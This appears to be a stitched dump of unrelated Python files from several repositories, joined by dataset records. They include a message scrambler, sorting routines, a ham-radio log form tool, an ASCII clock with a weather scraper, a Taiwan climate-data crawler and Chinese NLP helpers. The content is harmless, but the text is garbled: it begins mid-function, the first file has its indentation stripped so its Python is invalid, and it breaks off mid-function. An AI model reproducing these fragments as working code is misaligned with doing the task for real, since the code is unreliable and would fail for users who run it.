decoding_dict = dict(zip(last_sixteen, decoders))
if order_of_encoding is None:
if switches % 2 == 1:
order_of_encoding = "".join(choice(first_sixteen) if not x % 2 else choice(last_sixteen)
for x in range(switches))
else:
reverts_needed = int(switches / 2)
order_of_encoding = "".join(map(lambda x: "".join(x), zip(choices(first_sixteen, k=reverts_needed),
choices(last_sixteen, k=reverts_needed))))
else:
encodes = [order_of_encoding[x] for x in range(0, len(order_of_encoding),2)]
decodes = [order_of_encoding[x] for x in range(1, len(order_of_encoding),2)]
if any(encode not in encoding_dict for encode in encodes) or \
any(decode not in decoding_dict for decode in decodes):
print("Something's wrong with your order of encoding")
return
len_message = len(message)
print(f"len message {len_message}")
if mode == "numbers":
message = ",".join(str(ord(letter)) for letter in message) + ","
space_left = (height * width) - len(message)
commas_needed = int(space_left / 5)
numbers_needed = int(space_left * (4 / 5))
numbers_needed += (height * width) - (numbers_needed + commas_needed + len(message))
min_x_num_digits = int("1" + "0" * (numbers_needed - 1))
max_x_num_digits = int("9" * numbers_needed)
thing = list(str(randrange(min_x_num_digits, max_x_num_digits))) + list("," * commas_needed)
shuffle(thing)
message += "".join(thing)
else:
characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV' \
'WXYZ 1234567890"\'^[]<>{}\\/|;:.,~!?@#$%=&*()°€¥£-_+'
message += "".join(choices(characters, k=(height * width)))
for x, letter in enumerate(order_of_encoding):
if x % 2 == 0:
message = encoding_dict[letter](message, height=height, width=width, spaces=0)
else:
message = decoding_dict[letter](message, spaces=0)
return message, order_of_encoding, dict_chars, len_message
def the_most_insane_decoder(message, dict_chars, order_of_encoding, len_message, **kwargs):
height = kwargs.get("height", 10)
width = kwargs.get("width", 10)
mode = kwargs.get("mode", "")
encoders = [ BL_left_right_horizontal,
BL_south_east_diagonal,
BL_south_west_diagonal,
BL_top_up_vertical,
BR_right_left_horizontal,
BR_south_east_diagonal,
BR_south_west_diagonal,
BR_top_up_vertical,
TL_left_right_horizontal_v2,
TL_north_east_diagonal,
TL_south_west_diagonal,
TL_top_down_vertical,
TR_right_left_horizontal,
TR_north_west_diagonal,
TR_south_east_diagonal,
TR_top_down_vertical ]
decoders = [ BL_left_right_horizontal_revert,
BL_south_east_diagonal_revert,
BL_south_west_diagonal_revert,
BL_top_up_vertical_revert,
BR_right_left_horizontal_revert,
BR_south_east_diagonal_revert,
BR_south_west_diagonal_revert,
BR_top_up_vertical_revert,
TL_left_right_horizontal_revert,
TL_north_east_diagonal_revert,
TL_south_west_diagonal_revert,
TL_top_down_vertical_revert,
TR_right_left_horizontal_revert,
TR_north_west_diagonal_revert,
TR_south_east_diagonal_revert,
TR_top_down_vertical_revert ]
opposite_dict = dict(zip(decoders + encoders, encoders + decoders))
first_sixteen = dict_chars[:16]
last_sixteen = dict_chars[16:]
encoding_dict = dict(zip(first_sixteen, encoders))
decoding_dict = dict(zip(last_sixteen, decoders))
result = int(order_of_encoding[0] in encoding_dict)
for x, letter in enumerate(order_of_encoding[::-1]):
if x % 2 == result:
message = opposite_dict[encoding_dict[letter]](message, spaces=0)
else:
message = opposite_dict[decoding_dict[letter]](message, height=height, width=width, spaces=0)
if mode == 'numbers':
message = "".join(chr(int(number)) for number in message.split(',')[:len_message])
# message = "".join(map(lambda x: chr(int(x)), message.split(',')[:len_message]))
else:
message = message[:len_message]
return message
# OPTIONS:_______________________________________________________________________
message = "Somebody once told me the world was gonna roll me I ain't the sharpest tool" \
" in the shed She was looking kind of dumb with her finger and her thumb"
success = 0
height = 30
width = 30
mode = "numbers"
spaces = 2
switch_amount = 10
# _______________________________________________________________________________
encoded_message, encoding_list, thirty_two_chars, len_message = the_most_insane_encoder \
(message, switches=switch_amount, height=height, width=width, mode=mode)
print(f"scrambled message : \n{encoded_message}"
f"\norder of encoding : {encoding_list}"
f"\ndict chars : {thirty_two_chars}")
decoded_message = the_most_insane_decoder \
(encoded_message, thirty_two_chars, encoding_list, len_message, height=height, width=width, mode=mode)
print(f"decoded message : {decoded_message.strip()}")
``` |
{
"source": "Ji19283756/sorting_stuff",
"score": 4
} |
#### File: Ji19283756/sorting_stuff/no_bool_bubble_sort.py
```python
def no_bool_bubble_sort(unsorted_list):
for y in range(1, len(unsorted_list) - 1):
for x in range(len(unsorted_list) - y):
try:
value = \
(((unsorted_list[x] - unsorted_list[x + 1]) // abs(
unsorted_list[x + 1] - unsorted_list[x])) + 1) // 2
unsorted_list[x], unsorted_list[x + 1] = unsorted_list[x + value], unsorted_list[x + 1 - value]
except ZeroDivisionError:
pass
return unsorted_list
```
#### File: Ji19283756/sorting_stuff/python_quicksort.py
```python
from random import shuffle, randrange
def quicksort_pass(temp_list):
if len(temp_list) == 1:
return temp_list
pivot_point = temp_list[randrange(0, len(temp_list) - 1)]
same_as_pivot = [pivot_point]
temp_list.remove(pivot_point)
less_than_pivot = []
more_than_pivot = []
for value in temp_list:
if value < pivot_point:
less_than_pivot += [value]
elif value > pivot_point:
more_than_pivot += [value]
elif value == pivot_point:
same_as_pivot += [value]
if len(less_than_pivot) > 1:
less_than_pivot = quicksort_pass(less_than_pivot)
if len(more_than_pivot) > 1:
more_than_pivot = quicksort_pass(more_than_pivot)
return less_than_pivot + same_as_pivot + more_than_pivot
thing = list(range(100))
shuffle(thing)
print(quicksort_pass(thing))
``` |
{
"source": "JI1FLB/N1MM-Logger-ADIF-to-HL-convertor",
"score": 3
} |
#### File: JI1FLB/N1MM-Logger-ADIF-to-HL-convertor/Phase0.py
```python
def phase0():
#------------------------------
#
# JARLサマリーシート作成
#
# 仕様:記入フォームから、summaryフォーマットに変換
import os
fill_in_form = open( "form.txt" ,"r", encoding='utf-8')
Callsign =""
# GestOP_Callsign =""
# GestOP_flag = "N"
# Multi_OP_flag = "N"
# FD_flag ="N"
# yesno = "N"
# okng = True
# FD_coe = 1
Ph0 = []
#----------------------------------------------------------------------
print("\n")
print("*** サマリーシート必要事項選択")
print("\n")
#------------------------------------------------------------------------
#
# コールサイン取得
# サマリーシート作成
#
fill_in = fill_in_form.readlines()
for fill in fill_in :
fill = fill.rstrip('\n')
fill = fill.strip()
fill = fill.split(":")
if "コールサイン"==fill[0] :
Callsign = fill[1]
Callsign = Callsign.lstrip().rstrip()
Ph0.append(Callsign)
break
fill_in_form.close()
return Ph0
``` |
{
"source": "JI1FLB/N1MM-Logger-ADIF-to-JARL-contest-log-rev3",
"score": 4
} |
#### File: JI1FLB/N1MM-Logger-ADIF-to-JARL-contest-log-rev3/form_viewer.py
```python
def form_viewer() :
import tkinter as tk
import os
# Main windows
editor = tk.Tk()
editor.title('form file Viewer')
def open_form() :
fill_in_form = open( "form.txt" ,"r", encoding='utf-8')
fill_in = fill_in_form.readlines()
for fill in fill_in :
fill = fill.lstrip('[')
fill = fill.lstrip()
fill = fill.rstrip(']')
fill = fill.rstrip()
text_widget.insert('end',fill+'\n')
fill_in_form.close()
def save_form() :
# form.txtファイルのバックアップを追加する。
save_form = text_widget.get('1.0','end -1c')
fill_in_form_new = open( "form.txt" ,"w", encoding='utf-8')
fill_in_form_new.write( save_form )
fill_in_form_new.close()
# 表示情報の削除
text_widget.delete('1.0','end')
def close_disp() :
editor.destroy()
text_widget = tk.Text(editor)
text_widget.grid(column = 0, row = 0, sticky = (tk.N, tk.S, tk.E, tk.W))
editor.columnconfigure(0, weight = 1)
editor.rowconfigure(0, weight = 1)
#メニューバー作成
men = tk.Menu(editor)
#メニューバーを画面にセット
editor.config(menu=men)
#メニューに親メニュー(ファイル)を作成する
menu_file = tk.Menu(editor)
men.add_cascade(label='ファイル', menu=menu_file)
#親メニューに子メニュー(開く・閉じる)を追加する
menu_file.add_command(label='Open', command=open_form)
menu_file.add_separator()
menu_file.add_command(label='Save', command=save_form)
menu_file.add_separator()
menu_file.add_command(label='close', command=close_disp)
editor.mainloop()
``` |
{
"source": "ji24601/ascii_clock_v1.0",
"score": 3
} |
#### File: ji24601/ascii_clock_v1.0/digital.py
```python
import os
import time
import math
import datetime
import keyboard
from asciicanvas import AsciiCanvas
from weather import get_weather
import calendar
from colorama import init, Fore, Back, Style
init(autoreset=True)
x_scale_ratio = 1.75
location, temperature = get_weather()
t=time.localtime()
Y=int(t.tm_year)
M=int(t.tm_mon)
todays = int(t.tm_mday)
startday = 0
lastday = 0
keys = [
"down arrow",
"up arrow",
"left arrow",
"right arrow",
"enter",
"<",
">",
"[",
"]"
]
line1={1:" []", 2:"[][][][][]", 3:"[][][][][]", 4:"[] []", 5:"[][][][][]", 6:"[][][][][]", 7:"[][][][][]", 8:"[][][][][]", 9:"[][][][][]", 0:"[][][][][]"}
line2={1:" []", 2:" []", 3:" []", 4:"[] []", 5:"[] ", 6:"[] ", 7:" []", 8:"[] []", 9:"[] []", 0:"[] []"}
line3={1:" []", 2:" []", 3:" []", 4:"[] []", 5:"[] ", 6:"[] ", 7:" []", 8:"[] []", 9:"[] []", 0:"[] []"}
line4={1:" []", 2:" []", 3:" []", 4:"[] []", 5:"[] ", 6:"[] ", 7:" []", 8:"[] []", 9:"[] []", 0:"[] []"}
line5={1:" []", 2:"[][][][][]", 3:"[][][][][]", 4:"[][][][][]", 5:"[][][][][]", 6:"[][][][][]", 7:" []", 8:"[][][][][]", 9:"[][][][][]", 0:"[] []"}
line6={1:" []", 2:"[] ", 3:" []", 4:" []", 5:" []", 6:"[] []", 7:" []", 8:"[] []", 9:" []", 0:"[] []"}
line7={1:" []", 2:"[] ", 3:" []", 4:" []", 5:" []", 6:"[] []", 7:" []", 8:"[] []", 9:" []", 0:"[] []"}
line8={1:" []", 2:"[] ", 3:" []", 4:" []", 5:" []", 6:"[] []", 7:" []", 8:"[] []", 9:" []", 0:"[] []"}
line9={1:" []", 2:"[][][][][]", 3:"[][][][][]", 4:" []", 5:"[][][][][]", 6:"[][][][][]", 7:" []", 8:"[][][][][]", 9:"[][][][][]", 0:"[][][][][]"}
def draw_digital_second_hand(ascii_canvas, x, y, sec):
"""
Draw second hand
"""
ascii_canvas.add_text(x, y + 0, line1[sec//10] + " " + line1[sec%10]);
ascii_canvas.add_text(x, y + 1, line2[sec//10] + " " + line2[sec%10]);
ascii_canvas.add_text(x, y + 2, line3[sec//10] + " " + line3[sec%10]);
ascii_canvas.add_text(x, y + 3, line4[sec//10] + " " + line4[sec%10]);
ascii_canvas.add_text(x, y + 4, line5[sec//10] + " " + line5[sec%10]);
ascii_canvas.add_text(x, y + 5, line6[sec//10] + " " + line6[sec%10]);
ascii_canvas.add_text(x, y + 6, line7[sec//10] + " " + line7[sec%10]);
ascii_canvas.add_text(x, y + 7, line8[sec//10] + " " + line8[sec%10]);
ascii_canvas.add_text(x, y + 8, line9[sec//10] + " " + line9[sec%10]);
def draw_digital_minute_hand(ascii_canvas, x, y, min):
"""
Draw minute hand
"""
ascii_canvas.add_text(x, y + 0, line1[min//10] + " " + line1[min%10] + " ");
ascii_canvas.add_text(x, y + 1, line2[min//10] + " " + line2[min%10] + " ");
ascii_canvas.add_text(x, y + 2, line3[min//10] + " " + line3[min%10] + " ");
ascii_canvas.add_text(x, y + 3, line4[min//10] + " " + line4[min%10] + " ");
ascii_canvas.add_text(x, y + 4, line5[min//10] + " " + line5[min%10] + " ");
ascii_canvas.add_text(x, y + 5, line6[min//10] + " " + line6[min%10] + " ");
ascii_canvas.add_text(x, y + 6, line7[min//10] + " " + line7[min%10] + " ");
ascii_canvas.add_text(x, y + 7, line8[min//10] + " " + line8[min%10] + " ");
ascii_canvas.add_text(x, y + 8, line9[min//10] + " " + line9[min%10] + " ");
def draw_digital_hour_hand(ascii_canvas, x, y, hour):
"""
Draw hour hand
"""
ascii_canvas.add_text(x, y + 0, line1[hour//10] + " " + line1[hour%10] + " ");
ascii_canvas.add_text(x, y + 1, line2[hour//10] + " " + line2[hour%10] + " ");
ascii_canvas.add_text(x, y + 2, line3[hour//10] + " " + line3[hour%10] + " ");
ascii_canvas.add_text(x, y + 3, line4[hour//10] + " " + line4[hour%10] + " ");
ascii_canvas.add_text(x, y + 4, line5[hour//10] + " " + line5[hour%10] + " ");
ascii_canvas.add_text(x, y + 5, line6[hour//10] + " " + line6[hour%10] + " ");
ascii_canvas.add_text(x, y + 6, line7[hour//10] + " " + line7[hour%10] + " ");
ascii_canvas.add_text(x, y + 7, line8[hour//10] + " " + line8[hour%10] + " ");
ascii_canvas.add_text(x, y + 8, line9[hour//10] + " " + line9[hour%10] + " ");
def draw_digital_calendar(ascii_canvas, startday, lastday, today):
x, y = 79, 22
ascii_canvas.add_text(x, y, Back.RED + Fore.WHITE + '[' + str(Y) + '/' + str(M).rjust(2, '0') + '/' + str(todays).rjust(2, '0') + ']' + Fore.WHITE)
x, y = 71, 23
ascii_canvas.add_text(x, y, '----------------------------')
x, y = 71, 24
ascii_canvas.add_text(x, y, Fore.RED + ' Sun' + Fore.WHITE + ' Mon Tue Wed Thu Fri ' + Fore.CYAN + 'Sat' + Fore.WHITE)
y = y + 1
if startday == 6:
s = 1
else:
s = startday + 2
c = 0
m = 0
msg = ''
for k in range(6):
for i in range(7):
c = c + 1
if c < s:
x = x + 4
# ascii_canvas.add_text(x, y, ' '.center(4, ' '))
else:
if lastday > m:
m = m + 1
if m == today:
msg = msg + ' ' + Fore.GREEN + str(m).rjust(2, ' ')
elif (c - 1) % 7 == 0:
msg = msg + Fore.RED + str(m).rjust(4, ' ')
# ascii_canvas.add_text(x, y, Fore.RED + str(m).rjust(3, ' ') + Fore.WHITE)
elif c % 7 == 0:
msg = msg + Fore.CYAN + str(m).rjust(4, ' ')
# ascii_canvas.add_text(x, y, Fore.CYAN + str(m).rjust(3, ' ') + Fore.WHITE)
else:
msg = msg + Fore.WHITE + str(m).rjust(4, ' ')
# ascii_canvas.add_text(x, y, str(m).rjust(3, ' '))
# x = x + 3
ascii_canvas.add_text(x, y, msg + Fore.WHITE)
msg = ''
y = y + 1
if k % 2 == 0:
x = 70
else:
x = 71
def draw_digital_clock(cols, lines):
"""
Draw clock
"""
if cols < 25 or lines < 25:
print('Too little columns/lines for print out the clock!')
exit()
# create ascii canvas for clock and eval vars
ascii_canvas = AsciiCanvas(cols * 2, lines)
# add clock region and clock face
now = datetime.datetime.now()
ascii_canvas.add_rect(27, 2, 86, 15)
# add clock hands
x, y = int(math.ceil(ascii_canvas.cols / 4.0)) - 4, 5
draw_digital_hour_hand(ascii_canvas, x, y, now.hour)
x = x + 25
draw_digital_minute_hand(ascii_canvas, x, y, now.minute)
x = x + 25
draw_digital_second_hand(ascii_canvas, x, y, now.second)
# draw weather
global location
global temperature
ascii_canvas.add_text(17, 18, 'ooooooooooooooooooooooooooooooooooooooooooooooooo')
ascii_canvas.add_text(17, 19, 'o o')
ascii_canvas.add_text(17, 20, 'o ' + location + ' ' + temperature + '\" o')
ascii_canvas.add_text(17, 21, 'o o')
ascii_canvas.add_text(17, 22, 'ooooooooooooooooooooooooooooooooooooooooooooooooo')
# draw calendar
global todays
global lastday
global startday
global Y
global M
startday, lastday = calendar.calendar(Y, M)
draw_digital_calendar(ascii_canvas, startday, lastday, todays)
#draw info
y = 24
ascii_canvas.add_text(17, y, '<Infomation>')
ascii_canvas.add_text(17, y + 2, ' [ key: year - 1')
ascii_canvas.add_text(17, y + 4, ' ] key: year + 1')
ascii_canvas.add_text(17, y + 6, ' < key: month - 1')
ascii_canvas.add_text(17, y + 8, ' > key: month + 1')
ascii_canvas.add_text(17, y + 10, 'enter key: go memo')
ascii_canvas.add_text(39, y + 2, '|')
ascii_canvas.add_text(39, y + 3, '|')
ascii_canvas.add_text(39, y + 4, '|')
ascii_canvas.add_text(39, y + 5, '|')
ascii_canvas.add_text(39, y + 6, '|')
ascii_canvas.add_text(39, y + 7, '|')
ascii_canvas.add_text(39, y + 8, '|')
ascii_canvas.add_text(39, y + 9, '|')
ascii_canvas.add_text(39, y + 10, '|')
ascii_canvas.add_text(41, y + 2, ' → key: day + 1')
ascii_canvas.add_text(41, y + 4, ' ← key: day - 1')
ascii_canvas.add_text(41, y + 6, ' ↑ key: day - 7')
ascii_canvas.add_text(41, y + 8, ' ↓ key: day + 7')
ascii_canvas.add_text(41, y + 10, 'slash key: change clock')
#draw change mode
x, y = 73, 19
ascii_canvas.add_text(x, y, '[v] Analog')
x, y = 103, 19
ascii_canvas.add_text(x, y, Style.BRIGHT + Fore.YELLOW + '[v] Digital' + Style.DIM)
# print out canvas
ascii_canvas.print_out()
def main():
global todays
global lastday
global Y
global M
lines = 40
cols = int(lines * x_scale_ratio)
# set console window size and screen buffer size
if os.name == 'nt':
os.system('mode con: cols=%s lines=%s' % (cols * 2 + 1, lines + 1))
while True:
try:
# for key in keys:
# if keyboard.is_pressed(key):
# print(keyboard.key_to_scan_codes(key))
# print(f"{key} pressed")
if keyboard.is_pressed('esc'):
print(key + " pressed")
break
elif keyboard.is_pressed('left arrow'):
todays = todays - 1
if todays < 1:
todays = 1
time.sleep(0.1)
elif keyboard.is_pressed('right arrow'):
todays = todays + 1
if lastday < todays:
todays = lastday
time.sleep(0.1)
elif keyboard.is_pressed('up arrow'):
todays = todays - 7
if todays < 1:
todays = 1
time.sleep(0.1)
elif keyboard.is_pressed('down arrow'):
todays = todays + 7
if lastday < todays:
todays = lastday
time.sleep(0.1)
elif keyboard.is_pressed('['):
M = M - 1
time.sleep(0.1)
elif keyboard.is_pressed(']'):
M = M + 1
time.sleep(0.1)
elif keyboard.is_pressed('<'):
Y = Y - 1
time.sleep(0.1)
elif keyboard.is_pressed('>'):
Y = Y + 1
time.sleep(0.1)
#elif keyboard.is_pressed('enter'):
#time.sleep(0.1)
except:
print('except')
break
os.system('cls' if os.name == 'nt' else 'clear')
draw_digital_clock(cols, lines)
time.sleep(0.2)
if __name__ == '__main__':
main()
```
#### File: ji24601/ascii_clock_v1.0/weather.py
```python
from urllib.request import urlopen, Request
import urllib
import bs4
from asciicanvas import AsciiCanvas
def get_weather():
enc_location = urllib.parse.quote('날씨')
url = 'https://search.naver.com/search.naver?ie=utf8&query='+ enc_location
req = Request(url)
page = urlopen(req)
html = page.read()
soup = bs4.BeautifulSoup(html,'html5lib')
location = soup.find('div', class_='weather_box').find('em').text
temperature = soup.find('p', class_='info_temperature').find('span', class_='todaytemp').text
enc_location = urllib.parse.quote('영어로+' + location)
url = 'https://search.naver.com/search.naver?ie=utf8&query='+ enc_location
req = Request(url)
page = urlopen(req)
html = page.read()
soup = bs4.BeautifulSoup(html,'html5lib')
en_location = soup.find('div', class_='sentence en').find('strong').text
en_location = en_location.replace(' 전체듣기', '')
return en_location , temperature
# print('ㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁ')
# print('ㅁ ㅁ')
# print('ㅁ 현재 ' + en_location + ' 날씨는 ' + temperature + '도 입니다. ㅁ')
# print('ㅁ ㅁ')
# print('ㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁ')
``` |
{
"source": "ji3g4m6zo6/ins-hashtag-crawler",
"score": 3
} |
#### File: inscrawler/bin/climate_crawler.py
```python
def cdateList(year):
# days31 (1,3,5,7,8,10,12) days30(2,4,6,9,11)
month31=[1,3,5,7,8,10,12]
nday31=range(1,32)
nday30=range(1,31)
day10=['01','02','03','04','05','06','07','08','09']
month12=day10+['10','11','12']
nday31 = map(str,nday31[9:])
nday30 = map(str,nday30[9:])
day31 = day10 + nday31
day30 = day10 + nday30
yearData=[]
s=""
for month,strmonth in zip(range(1,13),month12):
if month in month31:
for day in day31:
s = year+'-'+strmonth+'-'+day
yearData.append(s)
else :
for day in day30:
s = year+'-'+strmonth+'-'+day
yearData.append(s)
return yearData
# 爬取主函式
def crawler(url,station,year,date):
resp = requests.get(url)
soup = BeautifulSoup(resp.text)
# find no data page
error = soup.find(class_="imp").string.encode('utf-8')
if error == '本段時間區間內無觀測資料。':
with open ("./nodata.txt",'a') as f:
f.write(url+'\n')
form =[]
# title
titles = soup.find_all("th")
titles = titles[9:]
strtitle=[]
for title in titles:
title = title.contents
title=title[0]+title[2]+title[4]
strtitle.append(title)
# parameter
soup = soup.tbody
tmps = soup.find_all("tr")
tmps = tmps[2:]
for tmp in tmps:
tmp = tmp.find_all("td")
parameter =[]
for strtmp in tmp:
strtmp = strtmp.string
parameter .append(strtmp)
form.append(parameter)
form = pd.DataFrame(form, columns=strtitle)
form.to_csv("./data/"+station+'/'+year+'/'+date+".csv", encoding ="utf-8")
# sleep(0.5)
# 有分nodata.txt 和 error.txt,nodata.txt是指網站沒資料
# error.txt 可能是連線失敗或是沒抓到,因此兩組相對再去抓沒抓到的
def errorCrawler():
nodatadirPath = './nodata.txt'
if os.path.exists(nodatadirPath) == 1 :
with open ("./nodata.txt",'r') as f:
nodataUrls = f.readlines()
with open ("./error.txt",'r') as f:
urls = f.readlines()
for url in urls:
url = url.strip()
url = url.split(',')
compareUrl = url[0]+'\n'
# 對照nodata.txt,本來就沒有資料就不抓
if compareUrl in nodataUrls:
pass
else:
try:
sleep(1)
crawler(url[0],url[1],url[2],url[3])
print('again:'+url[1]+','+url[2]+','+url[3])
# 再次紀錄第二次抓哪些資料
with open ("./error_reCrawler.txt",'a') as f:
f.write(url[0]+','+url[1]+','+url[2]+','+url[3]+'\n')
except :
print('error:'+url[1]+','+url[2]+','+url[3])
else:
with open ("./error.txt",'r') as f:
urls = f.readlines()
for url in urls:
url = url.strip()
url = url.split(',')
sleep(1)
print('again:'+url[1]+','+url[2]+','+url[3])
crawler(url[0],url[1],url[2],url[3])
# -*- coding: utf-8 -*-
import os
import requests
import pandas as pd
from time import sleep
from bs4 import BeautifulSoup
# 臺南 (467410) 永康 (467420) 嘉義 (467480) 臺中 (467490) 阿里山 (467530) 新竹 (467571) 恆春 (467590)
# 成功 (467610) 蘭嶼 (467620) 日月潭 (467650) 臺東 (467660) 梧棲 (467770) 七股 (467780) 墾丁 (467790)
# 馬祖 (467990) 新屋 (467050) 板橋 (466880) 淡水 (466900) 鞍部 (466910) 臺北 (466920) 竹子湖 (466930)
# 基隆 (466940) 彭佳嶼 (466950) 花蓮 (466990) 蘇澳 (467060) 宜蘭 (467080) 金門 (467110) 東吉島 (467300)
# 澎湖 (467350) 高雄 (467440) 大武 (467540) 玉山 (467550)
# 新竹 (467571) 真正的 url station 467570 官網標示錯誤
twStationList = ['467410','467420','467480','467490','467530','467570','467590','467610'
,'467620','467650','467660','467770','467780','467790','467990','467050','466880','466900'
,'466910','466920','466930','466940','466950','466990','467060','467080','467110','467300'
,'467350','467440','467540','467550']
# station
for station in twStationList:
# create station folder
dirPath = './data/'+station
if os.path.exists(dirPath) == 0:
os.makedirs(dirPath)
# year
yearList=['2013','2014']
for year in yearList:
dateList = cdateList(year)
# create year folder
dirPath = './data/'+station+'/'+year
if os.path.exists(dirPath) == 0:
os.makedirs(dirPath)
# date
for date in dateList:
# http://e-service.cwb.gov.tw/HistoryDataQuery/DayDataController.do?command=viewMain&station=467410&datepicker=2014-11-26
url="http://e-service.cwb.gov.tw/HistoryDataQuery/DayDataController.do?command=viewMain&station="+station+"&datepicker="+date
try:
print(station+':'+date)
crawler(url,station,year,date)
except:
print(station+':'+date+'error')
with open ("./error.txt",'a') as f:
f.write(url+','+station+','+year+','+date+'\n')
errordirPath = './error.txt'
if os.path.exists(errordirPath) == 1 :
errorCrawler()
``` |
{
"source": "ji3g4m6zo6/JioNLP",
"score": 3
} |
#### File: algorithm/ner/check_person_name.py
```python
import re
from jionlp.rule.rule_pattern import CHINESE_FAMILY_NAME, TWO_CHAR_CHINESE_FAMILY_NAME
class CheckPersonName(object):
""" 给定一个字符串,判断其是否为一个中国人名
原理目前仍非常简陋,即判断该字符串的长度,以及该串首字符是否为姓氏
"""
def __init__(self):
self.chinese_family_name = re.compile(CHINESE_FAMILY_NAME)
self.two_char_chinese_family_name = re.compile(
'(' + TWO_CHAR_CHINESE_FAMILY_NAME + ')')
def __call__(self, text):
text_length = len(text)
if text_length <= 1: # 非人名
return False
if text_length >= 5: # 非人名
return False
if text_length == 4:
# 4 字人名,其中包括两种情况:
# 1、姓氏为二字,如 “欧阳”
if self.chinese_family_name.search(text[0]) is not None \
and self.chinese_family_name.search(text[1]) is not None:
return True
# 2、首二字为单字姓氏,如父母姓氏的组合:“刘王晨曦”
if self.two_char_chinese_family_name.search(text[:2]) is not None:
return True
return False
if text_length == 3:
# 3 字人名
# 1、首字为姓氏,如 “张”
if self.chinese_family_name.search(text[0]) is not None:
return True
# 2、姓氏为二字,如 “上官”
if self.two_char_chinese_family_name.search(text[:2]) is not None:
return True
return False
if text_length == 2:
if self.chinese_family_name.search(text[0]) is not None:
return True
return False
```
#### File: jionlp/gadget/money_num2char.py
```python
import re
class MoneyNum2Char(object):
""" 给定一条数字金额,返回其汉字大写结果。
Args:
num(int|float|str): 数字金额
sim_or_tra(str): 可选 'sim' 或 'tra',控制汉字类型,默认为 'tra'
Returns:
str: 汉字金额
Examples:
>>> import jionlp as jio
>>> num = 120402810.03
>>> print(jio.money_num2char(num, sim_or_tra='tra'))
>>> num = '38,009.0'
>>> print(jio.money_num2char(num, sim_or_tra='sim'))
# 壹亿贰仟零肆拾萬贰仟捌佰壹拾點零叁
# 三万八千零九
"""
def __init__(self):
self.integer_pattern = None
def _prepare(self):
self.simplified_num_char = {
'0': '零', '1': '一', '2': '二', '3': '三', '4': '四',
'5': '五', '6': '六', '7': '七', '8': '八', '9': '九'}
self.traditional_num_char = {
'0': '零', '1': '壹', '2': '贰', '3': '叁', '4': '肆',
'5': '伍', '6': '陆', '7': '柒', '8': '捌', '9': '玖'}
self.simplified_inner_suffix = {
3: '千', 2: '百', 1: '十', 0: ''}
self.simplified_outer_suffix = {
0: '', 1: '万', 2: '亿', 3: '兆'}
self.traditional_inner_suffix = {
3: '仟', 2: '佰', 1: '拾', 0: ''}
self.traditional_outer_suffix = {
0: '', 1: '萬', 2: '亿', 3: '兆'}
self.money_char = {1: '分', 0: '角'}
self.integer_pattern = re.compile('(\d+)\.')
self.float_pattern = re.compile('\.(\d+)')
self.zero_cut_pattern = re.compile('零+$')
self.zero_shorten_pattern = re.compile('零+')
self.zero_delete_pattern = re.compile('^0+$')
self.sim_deci_start_pattern = re.compile('^(一十)')
self.tra_deci_start_pattern = re.compile('^(壹拾)')
def __call__(self, num, sim_or_tra='tra'):
""" 调用函数 """
if self.integer_pattern is None:
self._prepare()
integer_part = None
float_part = None
if type(num) is int:
num_string = str(num)
integer_part = num_string
elif type(num) is float:
num_string = str(num)
integer_part = self.integer_pattern.search(num_string).group(1)
float_part = self.float_pattern.search(num_string).group(1)
elif type(num) is str:
num_string = num.replace(',', '')
if '.' not in num_string:
integer_part = num_string
else:
integer_part = self.integer_pattern.search(num_string).group(1)
float_part = self.float_pattern.search(num_string).group(1)
integer_seg_list = self._seg_integer_part(integer_part)
integer_char_list = list()
for idx, seg in enumerate(range(len(integer_seg_list) - 1, -1, -1)):
seg_char = self._parse_integer_seg(integer_seg_list[idx], sim_or_tra=sim_or_tra)
if sim_or_tra == 'sim':
integer_char_list.append(seg_char + self.simplified_outer_suffix[seg])
elif sim_or_tra == 'tra':
integer_char_list.append(seg_char + self.traditional_outer_suffix[seg])
integer_string = ''.join(integer_char_list)
if float_part is not None:
matched = self.zero_delete_pattern.match(float_part[:2])
if matched is not None:
return integer_string
float_string = self._float2string(
float_part[:2], sim_or_tra=sim_or_tra)
if sim_or_tra == 'sim':
dot_string = '点'
elif sim_or_tra == 'tra':
dot_string = '點'
return integer_string + dot_string + float_string
return integer_string
@staticmethod
def _seg_integer_part(integer_part):
""" 将整数转换为每 4 个一节 """
seg_list = list()
flag = len(integer_part) % 4
if len(integer_part) % 4 != 0:
first_part = integer_part[:flag]
seg_list.append(first_part)
for i in range(flag, len(integer_part), 4):
seg_list.append(integer_part[i: i+4])
return seg_list
def _parse_integer_seg(self, integer_seg, sim_or_tra='sim'):
""" 将整数的每 4 个一节转换为汉字 """
thousand = ''
hundred = ''
deci = ''
enum = ''
for idx, i in enumerate(range(len(integer_seg) - 1, -1, -1)):
if idx == 0:
if integer_seg[i] == '0':
enum = ''
else:
if sim_or_tra == 'sim':
enum = self.simplified_num_char[integer_seg[i]]
elif sim_or_tra == 'tra':
enum = self.traditional_num_char[integer_seg[i]]
elif idx == 1:
if integer_seg[i] == '0':
deci = '零'
else:
if sim_or_tra == 'sim':
deci = self.simplified_num_char[integer_seg[i]] + '十'
elif sim_or_tra == 'tra':
deci = self.traditional_num_char[integer_seg[i]] + '拾'
elif idx == 2:
if integer_seg[i] == '0':
hundred = '零'
else:
if sim_or_tra == 'sim':
hundred = self.simplified_num_char[integer_seg[i]] + '百'
elif sim_or_tra == 'tra':
hundred = self.traditional_num_char[integer_seg[i]] + '佰'
elif idx == 3:
if integer_seg[i] == '0':
thousand = '零'
else:
if sim_or_tra == 'sim':
thousand = self.simplified_num_char[integer_seg[i]] + '千'
elif sim_or_tra == 'tra':
thousand = self.traditional_num_char[integer_seg[i]] + '仟'
tmp_res = ''.join([thousand, hundred, deci, enum])
tmp_res = self.zero_cut_pattern.sub('', tmp_res)
tmp_res = self.zero_shorten_pattern.sub('零', tmp_res)
if sim_or_tra == 'sim':
tmp_res = self.sim_deci_start_pattern.sub('十', tmp_res)
elif sim_or_tra == 'tra':
tmp_res = self.tra_deci_start_pattern.sub('拾', tmp_res)
return tmp_res
def _float2string(self, float_part, sim_or_tra='sim'):
""" 将小数转换为汉字,并仅截取两位(金额只保留 2 位) """
float_string_list = list()
for i in float_part:
if sim_or_tra == 'sim':
float_string_list.append(self.simplified_num_char[i])
elif sim_or_tra == 'tra':
